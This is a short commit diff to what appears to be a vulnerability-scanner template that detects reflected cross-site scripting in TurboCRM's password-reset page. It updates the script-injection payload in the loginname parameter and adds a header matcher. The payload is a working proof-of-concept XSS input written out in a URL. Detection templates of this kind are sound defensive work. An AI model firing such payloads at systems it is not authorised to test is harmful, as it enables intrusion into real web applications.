minor update

vulnerabilities/other/turbocrm-xss.yaml

@@ -10,16 +10,21 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/login/forgetpswd.php?loginsys=1&orgcode=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&loginname=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E'
+      - '{{BaseURL}}/login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
 
     matchers-condition: and
     matchers:
 
       - type: word
         words:
-          - '"><script>alert(/XSS/)</script>'
+          - '"><script>alert(document.domain)</script>'
         part: body
 
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
       - type: status
         status:
-          - 200
+          - 200